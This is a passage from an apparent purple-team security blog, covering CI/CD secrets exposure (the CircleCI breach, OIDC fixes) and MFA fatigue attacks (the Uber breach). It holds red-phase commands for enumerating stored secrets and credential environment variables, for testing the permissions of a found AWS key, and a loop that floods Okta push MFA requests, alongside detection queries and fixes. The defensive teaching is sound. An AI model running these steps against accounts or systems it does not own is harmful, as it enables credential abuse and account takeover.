│   Automated scanner ──────▶  clones within 60 seconds              │
│   Attacker ───────────────▶  accesses AWS before dev notices        │
│                                                                     │
│   VECTOR 2: STORED IN CI/CD PLATFORM                                │
│   DevOps ─── configures ──▶  AWS_ACCESS_KEY_ID in CircleCI         │
│   Attacker compromises CircleCI → exfiltrates all org env vars      │
│                                                                     │
│   VECTOR 3: IN CONTAINER/PROCESS ENV                                │
│   kubectl exec / docker inspect ──▶  printenv shows credentials     │
│   Anyone with container exec access = credential access             │
│                                                                     │
│   VECTOR 4: IN BUILD ARTIFACTS / LOGS                               │
│   Build log: "Using token: ghp_xxxxxxxxxxxx..." → exposed in log   │
│                                                                     │
│   ═══════════════════════════════════════════════════════           │
│   STRUCTURAL FIX: OIDC WORKLOAD IDENTITY                            │
│   No stored credential → nothing to commit, nothing to exfiltrate  │
│   CI job requests token at runtime → 1-hour TTL → expired          │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘

CI/CD secrets exposure is not primarily a developer discipline problem — it is a structural problem. When credentials are stored in a CI/CD platform, in environment variables, or in version control, the only question is when they will be exposed, not whether. The structural answer replaces stored credentials with dynamically issued, short-lived tokens that cannot be exfiltrated because they don’t persist.

The 25-Minute Compromise: How Automated Scanning Works Against You

At 2:47 AM, a developer committed a .env file to a public GitHub repository. It contained:

DATABASE_URL=postgres://admin:<password>@<db-host>:5432/customers
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
STRIPE_SECRET_KEY=sk_live_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
GITHUB_TOKEN=ghp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

At 2:48 AM — 60 seconds later — an automated scanner had cloned the repository. These scanners run continuously against GitHub’s public event stream, looking for credential patterns in new commits, new files, and new repository forks.

At 3:12 AM — 25 minutes after the commit — the database started receiving unusual queries. The automated scanning infrastructure is not operated by individuals manually watching for leaks. It is fully automated: pattern match → clone → test credential validity → if valid, begin exploitation or sell.

GitHub now runs its own secret scanning on public repositories and, for credential types covered by its partner program, notifies the issuer so the credential can be revoked or quarantined (GitHub revokes its own tokens; AWS attaches a quarantine policy to exposed IAM keys). This covers a subset of credential types. It does not cover database passwords, service-specific tokens for non-partnered services, or private repository commits that become public via fork.
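The pattern-match step in that automated chain is simple, which is part of why it runs so fast. As a rough illustration (not how any particular scanner is implemented), the sketch below finds strings shaped like long-lived AWS access key IDs; `find_aws_key_ids` is a hypothetical helper name, and the only key used is AWS's documentation example from the .env file above.

```shell
# find_aws_key_ids: read text on stdin and print each distinct string that has
# the shape of a long-lived AWS access key ID (AKIA + 16 uppercase letters or digits).
# This checks format only; it says nothing about whether the key is valid.
find_aws_key_ids() {
  grep -oE 'AKIA[0-9A-Z]{16}' | sort -u
}

# Example: scan two lines of a .env file
printf 'AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\nDEBUG=true\n' | find_aws_key_ids
```

Real scanners add many more detectors and then verify each hit against the provider's API. That is the "test credential validity" step, and it is what turns a pattern match into an exploitable credential.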

The CircleCI Breach: Platform-Level Credential Exfiltration

The CircleCI breach (January 2023) is the definitive example of CI/CD platform-level secrets exposure. The attack chain:

1. CircleCI engineer's laptop compromised via malware (initial vector not fully disclosed)
2. Malware steals a 2FA-authenticated SSO session token
3. Session token valid, not expired
4. Attacker uses session token to authenticate to CircleCI internal systems
5. From internal access, attacker reaches production database
6. Production database contains encrypted customer secrets (environment variables)
7. Attacker extracts the encryption keys from a running process on production systems
8. Attacker exfiltrates: encrypted secrets + encryption keys = plaintext secrets

What was stored in CircleCI environment variables by customers:
– AWS IAM access key ID and secret access key pairs
– GitHub personal access tokens and OAuth tokens
– DockerHub credentials
– SSH private keys (for deployment access)
– Heroku API keys
– Stripe, Twilio, SendGrid API keys
– Internal service account credentials

CircleCI could not determine which customer secrets were accessed and which were not — they notified all customers to rotate all credentials stored in their system.

The scale of the blast radius: any customer who had stored long-lived credentials in CircleCI environment variables was potentially compromised, because every one of those credentials was still valid when it was taken. CircleCI’s encryption at rest protected only against offline attacks; an attacker with internal database access who could also obtain the encryption keys had everything needed to decrypt.

Red Phase: Enumerating Secrets Exposure in Your Pipeline

Scanning Repositories for Committed Secrets

# Install: brew install trufflehog, download a release binary, or use the Docker image
docker run --rm \
  -v "$(pwd):/repo" \
  trufflesecurity/trufflehog:latest \
  git file:///repo \
  --json \
  --only-verified \
  2>/dev/null | \
  jq '{
    file: .SourceMetadata.Data.Git.file,
    commit: .SourceMetadata.Data.Git.commit,
    detector: .DetectorName,
    verified: .Verified,
    line: .SourceMetadata.Data.Git.line
  }'

# Gitleaks: alternative scanner with SARIF output for CI integration
gitleaks detect \
  --source . \
  --report-format sarif \
  --report-path gitleaks-report.sarif \
  --verbose

# Or: scan entire git history (catches secrets that were committed then deleted)
gitleaks detect \
  --source . \
  --log-opts="--all" \
  --report-format json \
  --report-path gitleaks-history.json

# Scan a specific GitHub organization's public repositories
# (test your own org before red team exercises)
trufflehog github \
  --org your-github-org \
  --token "${GITHUB_TOKEN}" \
  --json \
  --only-verified \
  2>/dev/null | \
  jq '{
    repo: .SourceMetadata.Data.Github.repository,
    file: .SourceMetadata.Data.Github.file,
    detector: .DetectorName,
    verified: .Verified
  }'

Enumerating Secrets in CI/CD Platform Environment Variables

# GitHub Actions: list secrets defined in a repository
# (shows names only — values are not returned by API, but names reveal what's stored)
curl -H "Authorization: Bearer ${GITHUB_TOKEN}" \
  -H "Accept: application/vnd.github+json" \
  "https://api.github.com/repos/your-org/your-repo/actions/secrets" | \
  jq '.secrets[] | {name: .name, updated: .updated_at}'

# GitHub Actions: list organization-level secrets
curl -H "Authorization: Bearer ${GITHUB_TOKEN}" \
  -H "Accept: application/vnd.github+json" \
  "https://api.github.com/orgs/your-org/actions/secrets" | \
  jq '.secrets[] | {name: .name, visibility: .visibility, updated: .updated_at}'

# Check for credentials in running pod environment variables (Kubernetes)
# This is what an attacker with kubectl exec access would do
kubectl get pods -A -o json | \
  jq -r '.items[] | 
    .metadata.namespace + "/" + .metadata.name + ": " + 
    ([.spec.containers[].env[]? | 
      select(.name | test("KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL|API"; "i")) |
      .name
    ] | join(", "))' | \
  grep -v ": $"  # Only show pods with matching env var names

Testing Whether AWS Keys in CI/CD Are Over-Permissioned

# If you find an AWS access key in a scan — test its permissions
# (on your own test account's keys only)
aws sts get-caller-identity
# Returns: account, user/role ARN, caller ID

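# What can this key do?
# simulate-principal-policy needs concrete action names (wildcards are not supported)
# and the ARN of an IAM user or role (not an assumed-role session ARN)
aws iam simulate-principal-policy \
  --policy-source-arn "$(aws sts get-caller-identity --query Arn --output text)" \
  --action-names "s3:ListAllMyBuckets" "s3:GetObject" "ec2:DescribeInstances" \
    "iam:CreateUser" "iam:AttachUserPolicy" "sts:AssumeRole" \
  --query 'EvaluationResults[?EvalDecision==`allowed`].EvalActionName' \
  --output text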

Blue Phase: Detection Across the Secret Lifecycle

GitHub Secret Scanning Alerts

# List secret scanning alerts in a repository via GitHub API
curl -H "Authorization: Bearer ${GITHUB_TOKEN}" \
  -H "Accept: application/vnd.github+json" \
  "https://api.github.com/repos/your-org/your-repo/secret-scanning/alerts?state=open" | \
  jq '.[] | {
    type: .secret_type,
    state: .state,
    created: .created_at,
    url: .html_url
  }'

CloudTrail: Detecting API Activity from CI/CD Credentials

When a CI/CD credential is used by an attacker, the CloudTrail events show unusual patterns:

# Find API calls made with the CI/CD user's credentials over the last 7 days
# and keep only those from public (non-RFC1918) source IPs, where a stolen key would show up
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=Username,AttributeValue=ci-deploy-user \
  --start-time "$(date -d '7 days ago' --iso-8601=seconds)" \
  --query 'Events[].{Time:EventTime,Name:EventName,IP:CloudTrailEvent}' \
  --output json | \
  jq '.[] | {
    time: .Time,
    event: .Name,
    ip: (.IP | fromjson | .sourceIPAddress),
    user_agent: (.IP | fromjson | .userAgent)
  }' | \
  jq 'select(.ip | test("^(10\\.|172\\.(1[6-9]|2[0-9]|3[01])\\.|192\\.168\\.)") | not)'
  # Filter: events from non-RFC1918 IPs (outside your known CI/CD IP ranges)
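The jq filter above keeps events whose source IP falls outside RFC 1918 space. The same test can be sketched as a small shell helper, which is handy when you post-process exported logs; `is_rfc1918` and `external_ips` are hypothetical names. Note that CloudTrail sometimes records an AWS service name instead of an IP address, and this sketch treats such values as external.

```shell
# is_rfc1918 ADDR: succeed when ADDR is in 10/8, 172.16/12 or 192.168/16.
is_rfc1918() {
  case "$1" in
    10.*|192.168.*) return 0 ;;
    172.1[6-9].*|172.2[0-9].*|172.3[01].*) return 0 ;;
    *) return 1 ;;
  esac
}

# external_ips: read one source address per line, print the non-private ones.
external_ips() {
  while IFS= read -r ip; do
    is_rfc1918 "$ip" || echo "$ip"
  done
}

# Usage: feed it the sourceIPAddress column from the query above
#   ... | jq -r '.ip' | sort -u | external_ips
```

Compare what remains against the published egress ranges of your CI/CD provider; anything outside both sets deserves a closer look.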

SIEM Query: Credential Used in Multiple Regions Simultaneously

A credential being used from multiple regions simultaneously is a strong indicator of compromise:

-- Athena query against CloudTrail logs
-- Detect: same access key used from multiple regions in same hour
SELECT
  userIdentity.accessKeyId,
  userIdentity.userName,
  COUNT(DISTINCT awsRegion) as region_count,
  ARRAY_AGG(DISTINCT awsRegion) as regions,
  COUNT(DISTINCT sourceIPAddress) as ip_count,
  ARRAY_AGG(DISTINCT sourceIPAddress) as source_ips,
  DATE_TRUNC('hour', from_iso8601_timestamp(eventTime)) as hour
FROM cloudtrail_logs
WHERE
  userIdentity.type = 'IAMUser'
  AND from_iso8601_timestamp(eventTime) > current_timestamp - interval '7' day
GROUP BY
  userIdentity.accessKeyId,
  userIdentity.userName,
  DATE_TRUNC('hour', from_iso8601_timestamp(eventTime))
HAVING COUNT(DISTINCT awsRegion) > 2
ORDER BY region_count DESC;

GuardDuty: Credential Exfiltration Indicators

# GuardDuty findings relevant to CI/CD credential compromise
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": [
          "UnauthorizedAccess:IAMUser/TorIPCaller",
          "UnauthorizedAccess:IAMUser/MaliciousIPCaller",
          "Discovery:IAMUser/AnomalousBehavior",
          "Exfiltration:IAMUser/AnomalousBehavior",
          "CredentialAccess:IAMUser/AnomalousBehavior"
        ]
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {type: .Type, user: .Resource.AccessKeyDetails.UserName, severity: .Severity}'

Purple Phase: The Structural Fix

Fix 1: OIDC Workload Identity — Eliminate Stored Credentials

This is the structural solution. Instead of storing an AWS IAM access key in your CI/CD platform, the CI/CD job authenticates to AWS using an OIDC token issued by the CI/CD provider. AWS validates the token against a pre-configured trust policy and issues temporary credentials valid for the duration of the job.

The OIDC workload identity approach eliminates static cloud access keys entirely — there is no secret to commit, no secret to exfiltrate from the CI/CD platform, and no long-lived credential to rotate on breach.

GitHub Actions with AWS OIDC — complete setup:

# .github/workflows/deploy.yml
name: Deploy to AWS

on:
  push:
    branches: [main]

permissions:
  id-token: write   # Required for OIDC token request
  contents: read

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Configure AWS credentials via OIDC
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::123456789012:role/github-actions-deploy-role
          role-session-name: github-actions-${{ github.run_id }}
          aws-region: us-east-1
          # No AWS_ACCESS_KEY_ID or AWS_SECRET_ACCESS_KEY needed

      - name: Deploy
        run: aws s3 sync ./dist s3://your-bucket/

AWS IAM trust policy for GitHub Actions OIDC:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::123456789012:oidc-provider/token.actions.githubusercontent.com"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
        },
        "StringLike": {
          "token.actions.githubusercontent.com:sub": "repo:your-org/your-repo:ref:refs/heads/main"
        }
      }
    }
  ]
}

# Create the OIDC provider in AWS (one-time setup)
aws iam create-open-id-connect-provider \
  --url https://token.actions.githubusercontent.com \
  --client-id-list sts.amazonaws.com \
  --thumbprint-list "6938fd4d98bab03faadb97b34396831e3780aea1"

# Create the IAM role with the trust policy above
aws iam create-role \
  --role-name github-actions-deploy-role \
  --assume-role-policy-document file://github-actions-trust-policy.json

# Attach a least-privilege policy to the role
aws iam attach-role-policy \
  --role-name github-actions-deploy-role \
  --policy-arn arn:aws:iam::123456789012:policy/deploy-policy

Fix 2: Pre-Commit Hooks — Catch Accidents Before They Reach VCS

Pre-commit hooks don’t stop a determined attacker. They catch accidents — the developer who forgets to move a .env file to .gitignore before staging all files.

# Install pre-commit framework
pip install pre-commit

# .pre-commit-config.yaml in your repository root
cat > .pre-commit-config.yaml << 'EOF'
repos:
  - repo: https://github.com/gitleaks/gitleaks
    rev: v8.18.4
    hooks:
      - id: gitleaks
        name: Detect hardcoded secrets
        entry: gitleaks protect --staged --redact --verbose
        language: golang
        pass_filenames: false

  - repo: https://github.com/pre-commit/pre-commit-hooks
    rev: v4.5.0
    hooks:
      - id: detect-private-key
      - id: check-added-large-files
        args: ['--maxkb=1000']
EOF

# Install the hooks in the local repository
pre-commit install

# Run every hook once against the whole repository to verify the setup
pre-commit run --all-files

Fix 3: CI-Layer Secret Scanning — Block Before Merge

# GitHub Actions: secret scanning as a required status check
# .github/workflows/secret-scan.yml
name: Secret Scan

on:
  pull_request:
    types: [opened, synchronize]

jobs:
  secret-scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0  # Full history for git log scanning

      - name: Run TruffleHog
        uses: trufflesecurity/trufflehog@main  # pin to a commit SHA for production use
        with:
          path: ./
          base: ${{ github.event.repository.default_branch }}
          head: HEAD
          extra_args: --only-verified --json

# GitLab CI: secret detection built-in template
include:
  - template: Security/Secret-Detection.gitlab-ci.yml

secret_detection:
  stage: test
  variables:
    SECRET_DETECTION_HISTORIC_SCAN: "true"  # Scan full history

Fix 4: Audit and Rotate Existing CI/CD Platform Secrets

After implementing OIDC, the migration path for existing stored credentials:

#!/bin/bash
# Purple Team EP06 — CI/CD Secrets Migration Audit
# Identifies AWS IAM keys stored in CI/CD that should be replaced with OIDC

echo "=== AWS IAM Keys Potentially Stored in CI/CD ==="
echo "--- Active access keys and when each was last used ---"

# Get all IAM access keys
aws iam list-users --query 'Users[].UserName' --output text | tr '\t' '\n' | \
  while read user; do
    keys=$(aws iam list-access-keys --user-name "$user" \
      --query 'AccessKeyMetadata[?Status==`Active`].{Key:AccessKeyId,Created:CreateDate}' \
      --output json)

    if [ "$(echo "$keys" | jq length)" -gt 0 ]; then
      echo ""
      echo "User: $user"
      echo "$keys" | jq -r '.[] | "  Key: " + .Key + " | Created: " + .Created'

      # Check last used
      echo "$keys" | jq -r '.[].Key' | while read key_id; do
        last_used=$(aws iam get-access-key-last-used --access-key-id "$key_id" \
          --query 'AccessKeyLastUsed.{Date:LastUsedDate,Service:ServiceName,Region:Region}' \
          --output json)
        echo "  Last used: $(echo "$last_used" | jq -r '.Date // "Never"') | Service: $(echo "$last_used" | jq -r '.Service // "N/A"')"
      done
    fi
  done

echo ""
echo "=== MIGRATION CHECKLIST ==="
echo "  1. For each CI/CD IAM key above:"
echo "     a. Identify which CI/CD platform uses it"
echo "     b. Set up OIDC trust policy for that platform"
echo "     c. Update pipeline to use OIDC (no stored key)"
echo "     d. Disable and then delete the IAM key"
echo "     e. Verify pipelines still work"

Run This in Your Own Environment: Secrets Exposure Audit

#!/bin/bash
# Purple Team EP06 — CI/CD Secrets Exposure Audit
# Run from your workstation with git and trufflehog installed

echo "=== 1. Scan Local Repository for Committed Secrets ==="
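if command -v trufflehog > /dev/null 2>&1; then
  # Capture findings first: an empty result means nothing was verified
  findings=$(trufflehog git "file://$(pwd)" --only-verified --json 2>/dev/null | \
    jq -c '{file: .SourceMetadata.Data.Git.file, detector: .DetectorName}')
  if [ -n "$findings" ]; then
    echo "$findings"
  else
    echo "  No verified secrets found in git history"
  fi
else
  echo "  Install trufflehog: brew install trufflehog (or use the Docker image)"
fi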

echo ""
echo "=== 2. Check for .env Files in Git History ==="
git log --all --full-history -- "*.env" "**/.env" ".env.*" 2>/dev/null | \
  grep "^commit" | head -5 | \
  while read _ commit; do
    echo "  .env file committed: $commit"
    git show "$commit" --stat | head -3
  done

echo ""
echo "=== 3. Check Running Pods for Credential Env Vars (Kubernetes) ==="
if command -v kubectl > /dev/null 2>&1; then
  kubectl get pods -A -o json 2>/dev/null | \
    jq -r '.items[] | 
      .metadata.namespace + "/" + .metadata.name + ": " + 
      ([.spec.containers[].env[]? | 
        select(.name | test("KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL"; "i")) |
        .name
      ] | join(", "))' | \
    grep -v ": $" | head -20
else
  echo "  kubectl not found"
fi

echo ""
echo "=== 4. GitHub Actions Secrets Inventory ==="
if [ -n "${GITHUB_TOKEN}" ]; then
  REPO="your-org/your-repo"  # Update this
  curl -s -H "Authorization: Bearer ${GITHUB_TOKEN}" \
    -H "Accept: application/vnd.github+json" \
    "https://api.github.com/repos/${REPO}/actions/secrets" | \
    jq '.secrets[] | {name: .name, updated: .updated_at}'
else
  echo "  Set GITHUB_TOKEN to enumerate repository secrets"
fi

⚠ Common Mistakes When Addressing CI/CD Secrets Exposure

Treating secret scanning as the primary control. TruffleHog and Gitleaks catch what gets committed. They do not prevent the CircleCI attack class — an attacker who compromises the CI/CD platform itself bypasses all scanning controls. Scanning is detection; OIDC workload identity is prevention.

Rotating compromised keys without checking CloudTrail for use. When a secret is exposed, the first question is not “rotate it” — it is “was it used?” Check CloudTrail for any API activity from the key between the suspected exposure time and the rotation. If the key was used, you have an active incident, not just a credential rotation task.
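The "was it used?" check can be scripted so it happens before anyone rotates anything. The following is a minimal sketch, assuming the AWS CLI is configured; `key_activity` and `triage_key` are hypothetical helper names. `lookup-events` only covers management events from the last 90 days in the current region, so treat an empty result as "nothing found here", not as proof the key was unused.

```shell
# key_activity KEY_ID START END: list management events recorded for one
# access key between two timestamps.
key_activity() {
  aws cloudtrail lookup-events \
    --lookup-attributes "AttributeKey=AccessKeyId,AttributeValue=$1" \
    --start-time "$2" \
    --end-time "$3" \
    --query 'Events[].[EventTime,EventName,EventSource]' \
    --output text
}

# triage_key KEY_ID START END: any output at all means the key was used.
triage_key() {
  local events
  events=$(key_activity "$@")
  if [ -n "$events" ]; then
    echo "ACTIVE INCIDENT: key was used during the exposure window"
    echo "$events"
  else
    echo "No management events found for this key in the window"
  fi
}

# Usage (needs AWS credentials; timestamps are illustrative):
#   triage_key AKIAIOSFODNN7EXAMPLE 2026-06-01T02:47:00Z 2026-06-01T04:00:00Z
```

Repeat the check in every region the key could reach, and query S3 data events separately if they are logged to a trail.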

Using OIDC trust policies that are too broad. The GitHub Actions OIDC trust policy in the fix section uses a StringLike condition on the sub claim to scope to a specific repository and branch. If the sub pattern is "*" instead (or the sub condition is missing), any GitHub Actions job in any repository can assume your role. Always scope OIDC trust policies to the specific repository, branch, and environment that needs the access.
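To see why the pattern matters, it can help to test candidate sub patterns against the claims different jobs would present. The sketch below approximates IAM's StringLike with shell glob matching (`*` and `?` as wildcards); `sub_allowed` is a hypothetical helper, and IAM's own policy evaluation remains the source of truth.

```shell
# sub_allowed PATTERN SUB: succeed when the sub claim SUB matches PATTERN.
# The pattern is deliberately left unquoted so that * and ? act as wildcards.
sub_allowed() {
  case "$2" in
    $1) return 0 ;;
    *)  return 1 ;;
  esac
}

# check PATTERN SUB: print the verdict for one pattern/claim pair.
check() {
  if sub_allowed "$1" "$2"; then
    echo "ALLOW  $2"
  else
    echo "DENY   $2"
  fi
}

# A scoped pattern admits only the main branch of one repository
check 'repo:your-org/your-repo:ref:refs/heads/main' 'repo:your-org/your-repo:ref:refs/heads/main'
check 'repo:your-org/your-repo:ref:refs/heads/main' 'repo:attacker/fork:ref:refs/heads/main'
# A bare wildcard admits a job from any repository
check '*' 'repo:attacker/fork:ref:refs/heads/main'
```

Running candidate patterns through a check like this before deploying a trust policy makes over-broad wildcards visible early.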

Not scanning git history, only the working tree. Secrets that were committed and then deleted are still in git history. git rm removes the file from the working tree but not from the object store. TruffleHog in git mode and gitleaks detect both walk commit history; make sure your invocation does, and that CI checkouts fetch full history (fetch-depth: 0) rather than a shallow clone. Scanning only the current working tree misses all historical exposures.

Forgetting third-party GitHub Actions. The supply chain attack surface includes the Actions you reference in your workflows. An Action referenced by a mutable ref (a branch such as @main, a tag such as @v1) can be changed by the maintainer. Pin to a specific commit SHA and verify the Action’s provenance.

# Vulnerable: mutable tag
- uses: aws-actions/configure-aws-credentials@v4

# Secure: pinned SHA
- uses: aws-actions/configure-aws-credentials@e3dd6a429d7300a6a4c196c26e831c1e4c763fe4
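Finding unpinned references by eye does not scale past a handful of workflows. The following is a minimal sketch of a check you could run locally or in CI; `unpinned_actions` is a hypothetical helper, and it assumes each `uses:` reference sits on its own line, as in the examples above. Local actions (`./path`) are skipped because they carry no ref.

```shell
# unpinned_actions FILE...: print "file:line:text" for every `uses:` reference
# that is not pinned to a full 40-character commit SHA.
unpinned_actions() {
  grep -nHE '^[[:space:]]*(-[[:space:]]*)?uses:[[:space:]]*[^[:space:]]+' "$@" \
    | grep -vE '@[0-9a-f]{40}([[:space:]]|$)' \
    | grep -vE 'uses:[[:space:]]*\./'
}

# Usage:
#   unpinned_actions .github/workflows/*.yml
```

The function exits non-zero when nothing is printed, so in a CI step you would typically fail the job only when it does produce output.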

Quick Reference

Secret Storage Pattern	Risk Level	Structural Fix
.env file committed to public repo	Critical	Pre-commit hook + OIDC
.env file committed to private repo	High	Git history purge + pre-commit hook + OIDC
Long-lived key in CI/CD env var	High	OIDC workload identity
Long-lived key in K8s Secret	High	Pod identity / IRSA / Workload Identity
Secret in build log output	Medium	Mask secrets in CI configuration
Secret in container env var	Medium	Vault agent / CSI secrets driver
Key referenced via AWS Secrets Manager	Low (if scoped)	Use for remaining static secrets

Key Takeaways

CI/CD secrets exposure is structural: long-lived credentials in a CI/CD platform are only as secure as that platform — the CircleCI breach proved that encryption alone is insufficient if the attacker can access the keys
Automated secret scanners find publicly committed credentials within 60–90 seconds, faster than any manual rotation; treat a publicly committed credential as compromised from the moment it is pushed
Pre-commit hooks and CI secret scanning catch accidents; they do not prevent determined attackers who compromise the platform itself
OIDC workload identity is the structural fix: no stored credential means no credential to exfiltrate
When rotating a compromised key, check CloudTrail for usage between exposure and rotation before closing the incident
OIDC trust policies must be scoped to specific repositories and branches — a wildcard trust policy recreates the exposure in a different form
Pin third-party GitHub Actions to commit SHAs, not mutable tags — mutable tags are a supply chain attack surface

What’s Next

EP07 covers SSRF to cloud metadata: how an SSRF vulnerability in any application layer becomes a straight line to IAM credentials when IMDSv2 is not enforced. The Capital One breach anatomy — WAF SSRF → EC2 metadata → IAM role credentials → 100 million S3 records — in full technical detail, with the simulation commands and the one-line enforcement fix. If you’ve addressed identity and secrets, the network attack paths are where EP07 through EP10 focus.


MFA Fatigue Attacks: How Uber Got Breached and How to Stop It

June 10, 2026 by Vamshi Krishna Santhapuri

Reading Time: 10 minutes


TL;DR

An MFA fatigue attack exploits push-notification MFA (Duo, Okta Verify, Microsoft Authenticator) by flooding a user with push requests until they accept one — either out of exhaustion or after social engineering
Uber (September 2022): contractor credentials purchased on a criminal marketplace → repeated Duo push notifications → WhatsApp social engineering → push accepted → admin PAM credentials found on internal file share → full access to AWS, GCP, Slack, HackerOne
The attack works because push MFA creates a UX habit: “tap accept” is a trained response, not a decision
Detection: multiple MFA failures followed by a single success in a short window — Okta System Log, Azure AD Sign-in Log, AWS CloudTrail
The structural fix is replacing push MFA with phishing-resistant FIDO2 hardware keys — not security awareness training, not more push notifications, not “number matching” alone
Okta (October 2023): support system breach exposed session tokens → attackers bypassed MFA entirely by using stolen session context

OWASP Mapping: A07 Identification and Authentication Failures. The Uber breach is the defining infrastructure example. Okta demonstrates session token theft as a related A07 variant.

The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│                    MFA FATIGUE ATTACK ANATOMY                       │
│                                                                     │
│   STEP 1: OBTAIN CREDENTIALS                                        │
│   Attacker ──── phish / buy on market ──────▶ username + password  │
│                                                                     │
│   STEP 2: TRIGGER MFA FLOOD                                         │
│   Attacker ──── repeated login attempts ────▶ Push #1 → User: NO   │
│                                               Push #2 → User: NO   │
│                                               Push #3 → User: NO   │
│                                               Push #4 → User: ???   │
│                                                                     │
│   STEP 3: SOCIAL ENGINEERING LAYER                                  │
│   Attacker ──── "Hi, I'm from IT support.                           │
│                  Please accept the next push."                      │
│                                               Push #4 → User: YES  │
│                                                                     │
│   STEP 4: ACCESS                                                    │
│   Attacker ──── authenticated session ──────▶ Internal network      │
│                                               Enumerate shares      │
│                                               Find next credential  │
│                                                                     │
│   ═══════════════════════════════════════════════════════           │
│   WHY TRAINING DOESN'T HELP:                                        │
│   Push MFA trains users to tap accept. The attacker exploits        │
│   the trained behavior. Education competes with habit.              │
│                                                                     │
│   WHY HARDWARE KEYS DO:                                             │
│   FIDO2 requires physical presence. A WhatsApp message              │
│   cannot accept a hardware key challenge.                           │
└─────────────────────────────────────────────────────────────────────┘

An MFA fatigue attack is how you bypass multi-factor authentication without breaking encryption or stealing the MFA seed — you exploit the user’s psychology and the UX of push-notification systems. The attacker knows the password. The only thing standing between them and access is the user’s willingness to tap “deny” indefinitely.

The Uber Breach: Anatomy Minute by Minute

September 15, 2022. The attacker’s capabilities: a purchased credential set for an Uber contractor account, a phone number, and patience.

The credential acquisition: Uber contractor credentials were available on criminal marketplaces. The attacker obtained a valid username and password for a contractor’s Uber corporate account.

The MFA flood:

The contractor’s account had Duo push-based MFA enrolled. The attacker initiated login attempts repeatedly, triggering a sequence of Duo push notifications to the contractor’s phone. The contractor rejected three or four of them. At this point, most attacks would stop — but the attacker added a social engineering layer.

The WhatsApp message:

The attacker sent a WhatsApp message to the contractor’s number, claiming to be from Uber IT support:

“Hi, this is the Uber IT support team. We’re seeing some issues with your account and need you to approve the next Duo notification to verify your identity.”

The contractor accepted the next push notification.

Post-authentication enumeration:

With an authenticated session, the attacker accessed Uber’s internal network. On an internal network share accessible to contractors, they found a PowerShell script. In that script: hardcoded Thycotic admin credentials. Thycotic is a Privileged Access Management (PAM) system — it stores credentials for privileged accounts across an organization.

The blast radius:

With Thycotic admin access, the attacker retrieved credentials for:
– AWS IAM accounts
– GCP service accounts
– Google Workspace admin
– VMware vSphere
– Slack workspace admin
– HackerOne bug bounty program admin (including details of open security reports)

The entire Uber infrastructure was accessible from one contractor’s push notification acceptance.

What Uber’s logs showed:

2022-09-15T02:17:00Z  [Duo] <contractor>  action=push_sent  result=rejected
2022-09-15T02:17:45Z  [Duo] <contractor>  action=push_sent  result=rejected
2022-09-15T02:18:30Z  [Duo] <contractor>  action=push_sent  result=rejected
2022-09-15T02:19:15Z  [Duo] <contractor>  action=push_sent  result=rejected
2022-09-15T02:22:00Z  [Duo] <contractor>  action=push_sent  result=approved
2022-09-15T02:22:05Z  [VPN] <contractor>  connection=established  ip=<attacker>

Four rejections followed by one approval in a five-minute window. This is a detectable pattern — but only if someone is looking for it.

Red Phase: Simulating MFA Fatigue

What the Attack Looks Like in Tooling

MFA fatigue attacks are conducted manually — an attacker with valid credentials and knowledge of which MFA system the target uses. No special tooling is required for the attack itself. What can be simulated:

Option 1: Repeated legitimate login attempts (test account only)

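# DO NOT run against production accounts or accounts you don't own

# Using the Okta Authentication API (test environment only)
TEST_USERNAME="<test-account-email>"  # placeholder: a dedicated test user you own
TEST_PASSWORD="TestPassword123!"
OKTA_DOMAIN="your-org.okta.com"

for i in {1..5}; do
  echo "Attempt $i at $(date +%T)"
  # Step 1: primary authentication (password only)
  response=$(curl -s -X POST \
    "https://${OKTA_DOMAIN}/api/v1/authn" \
    -H "Content-Type: application/json" \
    -d "{\"username\": \"${TEST_USERNAME}\", \"password\": \"${TEST_PASSWORD}\"}")

  status=$(echo "$response" | jq -r '.status')
  echo "  Status: $status"

  # Primary authentication returns MFA_REQUIRED when a factor is enrolled.
  # No push is sent until the factor's verify endpoint is called with the state token.
  if [ "$status" = "MFA_REQUIRED" ]; then
    state_token=$(echo "$response" | jq -r '.stateToken')
    factor_id=$(echo "$response" | jq -r '._embedded.factors[] | select(.factorType == "push") | .id')

    # Step 2: trigger the push notification (response status becomes MFA_CHALLENGE)
    verify=$(curl -s -X POST \
      "https://${OKTA_DOMAIN}/api/v1/authn/factors/${factor_id}/verify" \
      -H "Content-Type: application/json" \
      -d "{\"stateToken\": \"${state_token}\"}")
    echo "  Factor ID: $factor_id (push sent, factorResult=$(echo "$verify" | jq -r '.factorResult'))"

    # In a real attack, the attacker would poll the same endpoint for the MFA response:
    echo "  Waiting 10 seconds for user to respond..."
    sleep 10
  fi

  sleep 30  # Wait between attempts to avoid rate limiting
done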

Option 2: Tabletop exercise (no credentials required)

For organizations that cannot run live credential tests, the tabletop simulation maps the attack against your specific IdP logs. Pull 30 days of authentication logs and look for the pattern:

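# Okta System Log: find users with multiple MFA failures followed by success
# (30-day lookback; only the first 1000 events are returned, follow the Link header to paginate)
curl -s -H "Authorization: SSWS ${OKTA_API_TOKEN}" \
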